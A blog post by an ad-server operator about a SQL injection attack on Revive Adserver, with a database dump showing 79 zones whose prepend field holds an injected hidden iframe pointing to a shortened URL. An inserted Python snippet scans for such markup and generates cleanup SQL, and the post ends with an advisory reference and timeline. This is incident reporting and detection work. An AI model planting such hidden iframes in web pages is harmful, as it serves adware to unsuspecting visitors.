Revive Ad Server MySQL Injection Attack

No rest for the weary: a Revive Ad Server I am responsible for experienced a MySQL injection attack due to a vulnerability uncovered in the past few months. I was busy developing Vue.js code for the forums and thought to myself, "I will get around to upgrading to Revive 4.2.0 (supposedly the not-vulnerable version) when I get further down the road developing my Vue.js project". After all (sarcasm assured), why upgrade to mitigate a security vulnerability in a "working PHP 5.6 version of Revive" when upgrading to Revive 4.2.0 also requires an upgrade to PHP 7.0?!

Then, of course, it happens. No good deed goes unpunished, as they say; and while I was busy 12 hours a day coding in Vue.js, some "person with no life to speak of" injected very nasty adware into the DB. Here are the SQL table entries from the hacked server, in the vulnerable append and prepend fields in Revive (which I never use anyway), injected with this very nasty adware.

This adware pulled down a lot of code and really damaged the ad server, and also the search engine rankings because of the adware in the browser. Strangely, Google Webmaster Tools did not detect this, which is quite a shock, but there you go. Google Search really punished the site for the injected adware, but on the other hand, GWT did not detect it. Hmmm.

Here is what the "low lifes" injected:

```text
mysql> SELECT zoneid, append, prepend FROM ox_zones WHERE append != '' OR prepend != '';
+--------+--------+----------------------------------------------------------------------------------------+
| zoneid | append | prepend                                                                                |
+--------+--------+----------------------------------------------------------------------------------------+
|      1 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      2 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      3 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      4 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      5 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      6 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      7 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      8 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|      9 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     10 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     11 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     12 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     13 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     14 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     15 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     16 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     17 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     18 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     19 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     20 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     21 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     22 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     23 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     24 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     25 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     26 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     27 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     48 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     47 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     46 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     44 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     43 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     42 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     39 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     40 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     41 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     49 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     50 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     51 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     52 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     53 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     54 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     55 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     56 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     57 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     58 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     59 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     60 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     61 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     62 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     63 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     64 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     65 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     66 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     67 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     68 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     69 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     70 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     71 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     72 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     73 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     74 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     75 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     76 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     77 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     78 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     79 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     80 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     81 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     82 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     83 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     84 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     85 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     86 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     87 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     88 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     89 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     90 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
|     91 |        | <iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe> |
+--------+--------+----------------------------------------------------------------------------------------+
79 rows in set (0.00 sec)
```
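The query above is exactly the check an operator wants to run on a schedule. As an added example (not code from the post or from Revive), here is a small scanner over rows in the shape of that `SELECT zoneid, append, prepend FROM ox_zones` result: it flags the off-screen iframe pattern seen above plus a few related markers, and emits the per-zone cleanup statements for review. The sample rows are constructed; fetching real rows through a DB cursor is left to the caller, and blanking the fields assumes, as the post says, that append/prepend are not used legitimately.

```python
import re

# Constructed sample rows shaped like (zoneid, append, prepend) from ox_zones.
# Zone 1 mirrors the injected value quoted in the post; zones 2-4 are made up.
SAMPLE_ROWS = [
    (1, "", "<iframe style='position:absolute;left:-9999px;' src='//tinyurl.com/y4tkrgmb'></iframe>"),
    (2, "", ""),
    (3, "<!-- sponsor footer -->", ""),
    (4, "", "<script src='//example.invalid/x.js'></script>"),
]

# Heuristics for HTML that should never appear in a zone's append/prepend text
# on a server whose operator does not use those fields at all.
SUSPICIOUS = [
    ("iframe tag", re.compile(r"<iframe\b", re.I)),
    ("script tag", re.compile(r"<script\b", re.I)),
    ("off-screen positioning", re.compile(r"(left|top)\s*:\s*-\d{3,}px", re.I)),
    ("url shortener", re.compile(r"//(tinyurl\.com|bit\.ly|goo\.gl|t\.co)/", re.I)),
]


def scan_zone_rows(rows):
    """Return (zoneid, column, [reasons]) for every non-empty append/prepend
    value that matches at least one heuristic; clean rows are skipped."""
    findings = []
    for zoneid, append, prepend in rows:
        for column, value in (("append", append), ("prepend", prepend)):
            if not value:
                continue
            reasons = [name for name, rx in SUSPICIOUS if rx.search(value)]
            if reasons:
                findings.append((zoneid, column, reasons))
    return findings


def cleanup_sql(findings):
    """One UPDATE per flagged (zoneid, column) that blanks the field.
    zoneid is cast to int so the generated SQL contains no free-form text."""
    return [
        f"UPDATE ox_zones SET {column} = '' WHERE zoneid = {int(zoneid)};"
        for zoneid, column, _ in findings
    ]


if __name__ == "__main__":
    found = scan_zone_rows(SAMPLE_ROWS)
    for zoneid, column, reasons in found:
        print(f"zone {zoneid} {column}: {', '.join(reasons)}")
    print("\n".join(cleanup_sql(found)))
```

Review the generated statements before running them, and take a dump of ox_zones first so the injected values survive as evidence.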

I think I need to move off the Revive Ad Server, because this is the second time in around six years that the Revive software has been found to have an SQL injection vulnerability, and it has again cost me a lot of wasted time and damage to our "search engine reputation and integrity".

The last time it happened was a few days before New Year's, many years ago, when I was on vacation in Bali scuba diving with this very cool Japanese woman I used to know, and the entire holiday was ruined because of it.

People who do not operate on the web have little idea of how much work it is to keep the engine running smoothly, 24x7, so others can enjoy the web !! :()

Reference: Revive Adserver Security Advisory REVIVE-SA-2019-001, Date: 2019-04-23

  • Advisory ID: REVIVE-SA-2019-001
  • CVE-IDs: TBA
  • Date: 2019-04-23
  • Risk Level: High
  • Applications affected: Revive Adserver
  • Versions affected: < 4.2.0
  • Versions not affected: >= 4.2.0

Date of advisory: 2019-04-23. Date first signs of SQL injection noticed: 2019-04-30 (ad server disabled). Update complete: 2019-05-02.

... gotta be fast in today's fast-paced cyber world.
